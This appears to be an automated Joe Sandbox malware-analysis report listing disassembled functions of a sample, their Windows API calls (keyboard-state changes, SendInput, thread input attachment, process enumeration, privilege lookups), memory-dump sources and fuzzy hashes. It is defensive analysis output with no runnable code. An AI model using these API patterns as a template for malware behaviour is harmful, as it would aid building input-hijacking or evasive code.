                                                                                        • Part of subcall function 00C43820: RtlAllocateHeap.NTDLL(00000000,?,00CE1444,?,00C2FDF5,?,?,00C1A976,00000010,00CE1440,00C113FC,?,00C113C6,?,00C11129), ref: 00C43852
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID:
                                                                                      • API String ID: 2652629310-0
                                                                                      • Opcode ID: d19955e6e9c138387eb7ebee117a1e13bb3ccaa1d55b1c41225a1b726c10049e
                                                                                      • Instruction ID: c93c7a0e11b1334ce12a8181bebb36c02fad338d2685c12c2fb0f968acf626d0
                                                                                      • Opcode Fuzzy Hash: d19955e6e9c138387eb7ebee117a1e13bb3ccaa1d55b1c41225a1b726c10049e
                                                                                      • Instruction Fuzzy Hash: A231DE72A1020AABDF24AF65DC85EEE7BA5FB51310F050168FC15D7290EB35DE50DB90
                                                                                      Function 00CA52C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00CA5352
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA5375
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA5382
                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CA53A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                                      • String ID:
                                                                                      • API String ID: 3340791633-0
                                                                                      • Opcode ID: 7d05e8e90c5006e27f1cf6129591d755fbaa0a51a349ca00936746477d49090a
                                                                                      • Instruction ID: f0fad2c10934fefcdd0aae7eebcbaf5fbcc273d8a1ac05b352171d69e40819e6
                                                                                      • Opcode Fuzzy Hash: 7d05e8e90c5006e27f1cf6129591d755fbaa0a51a349ca00936746477d49090a
                                                                                      • Instruction Fuzzy Hash: AD31E234A57A0AFFEF309A15CC45BEC3761AB87398F588101FA21961F1C7B09A80EB41
                                                                                      Function 00C7AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C7ABF1
                                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C7AC0D
                                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C7AC74
                                                                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C7ACC6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: a7ab3594870e0c8c4a3c93b17813048f5bc5257581671959f7fa0a1e9b66a305
                                                                                      • Instruction ID: b3f9143d2b2186561e2d54f2534493dc4c123f564b605f5d3111d0dba9b645a9
                                                                                      • Opcode Fuzzy Hash: a7ab3594870e0c8c4a3c93b17813048f5bc5257581671959f7fa0a1e9b66a305
                                                                                      • Instruction Fuzzy Hash: 52310970A007187FEF36CB658C05BFE7BA5ABC5320F04C31AE4A9921D1C3768A859752
                                                                                      Function 00CA7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ClientToScreen.USER32(?,?), ref: 00CA769A
                                                                                      • GetWindowRect.USER32(?,?), ref: 00CA7710
                                                                                      • PtInRect.USER32(?,?,00CA8B89), ref: 00CA7720
                                                                                      • MessageBeep.USER32(00000000), ref: 00CA778C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1352109105-0
                                                                                      • Opcode ID: 95e01629bd60ac802e9d681ae4d4d8956edf324f3211574d54fd8d5b44802ee2
                                                                                      • Instruction ID: 916cd8716ca0d9715b43372b60c2964471753130a24048519294b66dadcd353c
                                                                                      • Opcode Fuzzy Hash: 95e01629bd60ac802e9d681ae4d4d8956edf324f3211574d54fd8d5b44802ee2
                                                                                      • Instruction Fuzzy Hash: 97417F34605256DFCB02CF58CD98FAD77F5BB4A318F1942A8E824DB261D730AA41CB90
                                                                                      Function 00CA16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetForegroundWindow.USER32 ref: 00CA16EB
                                                                                        • Part of subcall function 00C73A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73A57
                                                                                        • Part of subcall function 00C73A3D: GetCurrentThreadId.KERNEL32 ref: 00C73A5E
                                                                                        • Part of subcall function 00C73A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C725B3), ref: 00C73A65
                                                                                      • GetCaretPos.USER32(?), ref: 00CA16FF
                                                                                      • ClientToScreen.USER32(00000000,?), ref: 00CA174C
                                                                                      • GetForegroundWindow.USER32 ref: 00CA1752
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                      • String ID:
                                                                                      • API String ID: 2759813231-0
                                                                                      • Opcode ID: 01fc46f9a05f9b88213afbfd0f2c3a1950afcc48f7149e83ea338264a8dae047
                                                                                      • Instruction ID: d6c779cf39b1c52c281bbab8948a8c185a6c71c0e6ebfc01379a1fa6b6522880
                                                                                      • Opcode Fuzzy Hash: 01fc46f9a05f9b88213afbfd0f2c3a1950afcc48f7149e83ea338264a8dae047
                                                                                      • Instruction Fuzzy Hash: 7031FD75D00249AFD704EFA9C8C19EEBBF9EF49308B5480AAE415E7211DB319E45DBA0
                                                                                      Function 00C7D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7D501
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00C7D50F
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00C7D52F
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C7D5DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 420147892-0
                                                                                      • Opcode ID: 422396e3b3267b9632b16a878c5429573a30f7d8fdb4c7e5700f819120f5288d
                                                                                      • Instruction ID: 52d1ebe0b54dfb3044c0dd0acd2311c227f65100d6b94fa61d51e5d6488be01f
                                                                                      • Opcode Fuzzy Hash: 422396e3b3267b9632b16a878c5429573a30f7d8fdb4c7e5700f819120f5288d
                                                                                      • Instruction Fuzzy Hash: EB31C2711083009FD300EF54C891BAFBBF8EF9A354F10492DF596831A1EB719A85DB92
                                                                                      Function 00CA8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      • GetCursorPos.USER32(?), ref: 00CA9001
                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C67711,?,?,?,?,?), ref: 00CA9016
                                                                                      • GetCursorPos.USER32(?), ref: 00CA905E
                                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C67711,?,?,?), ref: 00CA9094
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                      • String ID:
                                                                                      • API String ID: 2864067406-0
                                                                                      • Opcode ID: 803c39e579731314999c0377900d58c7e5d3ed6999ed5b7c45563e24d8f2795b
                                                                                      • Instruction ID: d16e7304fe97b12b47aca78934da05bad66936fba52a5ceb43d12aeab56d99d0
                                                                                      • Opcode Fuzzy Hash: 803c39e579731314999c0377900d58c7e5d3ed6999ed5b7c45563e24d8f2795b
                                                                                      • Instruction Fuzzy Hash: 6921A135600018EFCB258F94DC99FFE7BB9EF4A3A4F144055F9154B261C7319AA0EB60
                                                                                      Function 00C7D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNEL32(?,00CACB68), ref: 00C7D2FB
                                                                                      • GetLastError.KERNEL32 ref: 00C7D30A
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C7D319
                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CACB68), ref: 00C7D376
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                      • String ID:
                                                                                      • API String ID: 2267087916-0
                                                                                      • Opcode ID: 0c15dcf6533da39e3085e257879be1df072d4a0061adcd4e539a1a1024036dd7
                                                                                      • Instruction ID: ac77682855c7eb104361a0e7742cdb78c686970b160e0ac272bc32bdb89ae22d
                                                                                      • Opcode Fuzzy Hash: 0c15dcf6533da39e3085e257879be1df072d4a0061adcd4e539a1a1024036dd7
                                                                                      • Instruction Fuzzy Hash: CD219F705092019F8700DF28C8819AE7BF4EF56328F108A1DF4AAC32A1DB31DA46DB93
                                                                                      Function 00C71571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C71014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C7102A
                                                                                        • Part of subcall function 00C71014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C71036
                                                                                        • Part of subcall function 00C71014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71045
                                                                                        • Part of subcall function 00C71014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C7104C
                                                                                        • Part of subcall function 00C71014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C71062
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C715BE
                                                                                      • _memcmp.LIBVCRUNTIME ref: 00C715E1
                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C71617
                                                                                      • HeapFree.KERNEL32(00000000), ref: 00C7161E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1592001646-0
                                                                                      • Opcode ID: d6d2ca9dd2a555ebc30b5fb553a8d4a6b1ab718da199b27bf0e4f90ff8e7f497
                                                                                      • Instruction ID: 07b21b558c197a208dc36e6c5471785f229b340281421504dca6ba1966a62f09
                                                                                      • Opcode Fuzzy Hash: d6d2ca9dd2a555ebc30b5fb553a8d4a6b1ab718da199b27bf0e4f90ff8e7f497
                                                                                      • Instruction Fuzzy Hash: CD219D31E00108EFDF14DFA8C985BEEB7B8EF44354F188459E859AB241E730AA05DBA0
                                                                                      Function 00CA2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00CA280A
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA2824
                                                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00CA2832
                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00CA2840
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long$AttributesLayered
                                                                                      • String ID:
                                                                                      • API String ID: 2169480361-0
                                                                                      • Opcode ID: c36dbd336b330ccc36628caa3a345d40673368e2fee7dadcf4b01f70dc2ad517
                                                                                      • Instruction ID: 6671f2331eb03a1e6f7fdbeb2e848616b406083dcd89925dd82a6f7bb67b51f9
                                                                                      • Opcode Fuzzy Hash: c36dbd336b330ccc36628caa3a345d40673368e2fee7dadcf4b01f70dc2ad517
                                                                                      • Instruction Fuzzy Hash: FA21D631604522AFD714DB28C884FAA7795EF47328F148158F426CB6D2CB75FD82DB90
                                                                                      Function 00C778F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00C78D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C7790A,?,000000FF,?,00C78754,00000000,?,0000001C,?,?), ref: 00C78D8C
                                                                                        • Part of subcall function 00C78D7D: lstrcpyW.KERNEL32(00000000,?,?,00C7790A,?,000000FF,?,00C78754,00000000,?,0000001C,?,?,00000000), ref: 00C78DB2
                                                                                        • Part of subcall function 00C78D7D: lstrcmpiW.KERNEL32(00000000,?,00C7790A,?,000000FF,?,00C78754,00000000,?,0000001C,?,?), ref: 00C78DE3
                                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C78754,00000000,?,0000001C,?,?,00000000), ref: 00C77923
                                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00C78754,00000000,?,0000001C,?,?,00000000), ref: 00C77949
                                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C78754,00000000,?,0000001C,?,?,00000000), ref: 00C77984
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                      • String ID: cdecl
                                                                                      • API String ID: 4031866154-3896280584
                                                                                      • Opcode ID: 0fbb03b78af89e05d3cd93d0bbf25391deb24a3900d3c8697ddcf7eaf6195079
                                                                                      • Instruction ID: 8b87fec604eb9bd397d83c8baa95700937b369a87ceedab6194062f441cd6345
                                                                                      • Opcode Fuzzy Hash: 0fbb03b78af89e05d3cd93d0bbf25391deb24a3900d3c8697ddcf7eaf6195079
                                                                                      • Instruction Fuzzy Hash: 9611293A201306ABCF156F34D844E7B77A5FF95354B00812EFA0AC7264EF319901D791
                                                                                      Function 00CA7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA7D0B
                                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CA7D2A
                                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CA7D42
                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C8B7AD,00000000), ref: 00CA7D6B
                                                                                        • Part of subcall function 00C29BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C29BB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Long
                                                                                      • String ID:
                                                                                      • API String ID: 847901565-0
                                                                                      • Opcode ID: 0ce250b49e09785377fd73658393102a587b5e8fbcc489d68604da372d36cb62
                                                                                      • Instruction ID: 8fc06cfc7570fb31406786ef29b5bf6fdac610739d85875fee2a74bb705575ca
                                                                                      • Opcode Fuzzy Hash: 0ce250b49e09785377fd73658393102a587b5e8fbcc489d68604da372d36cb62
                                                                                      • Instruction Fuzzy Hash: 8A117232A05666AFCB109F28DC44BAA3BA5BF46378B154724FC35DB2F0D7309A61DB50
                                                                                      Function 00CA5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00CA56BB
                                                                                      • _wcslen.LIBCMT ref: 00CA56CD
                                                                                      • _wcslen.LIBCMT ref: 00CA56D8
                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA5816
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend_wcslen
                                                                                      • String ID:
                                                                                      • API String ID: 455545452-0
                                                                                      • Opcode ID: 6ec7bb21334df91f0bc97f58413d40fbccd8353a0899db1e8c5f336ecb244c3d
                                                                                      • Instruction ID: 42b1f66983af257edb860582573f3a0c33b2f94e3f8b17e1614197cc6b18c95c
                                                                                      • Opcode Fuzzy Hash: 6ec7bb21334df91f0bc97f58413d40fbccd8353a0899db1e8c5f336ecb244c3d
                                                                                      • Instruction Fuzzy Hash: 0F11D67161060696DF20DFA1CC85BEE777CFF16768F108026F915D6181EB70DA84CB64
                                                                                      Function 00C71A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C71A47
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C71A59
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C71A6F
                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C71A8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: a196a008e0c3c052f4c139452cae163117fb30130b9eeae20d9096db1db0de60
                                                                                      • Instruction ID: f6e7898f527be73c3e4cf92757fc2ee7a15e1534ebfb2cb59f9cad27c998c0cb
                                                                                      • Opcode Fuzzy Hash: a196a008e0c3c052f4c139452cae163117fb30130b9eeae20d9096db1db0de60
                                                                                      • Instruction Fuzzy Hash: 80113C3AD01219FFEB10DBA9CD85FADBB78EB04750F244091EA04B7290D6716F50EB94
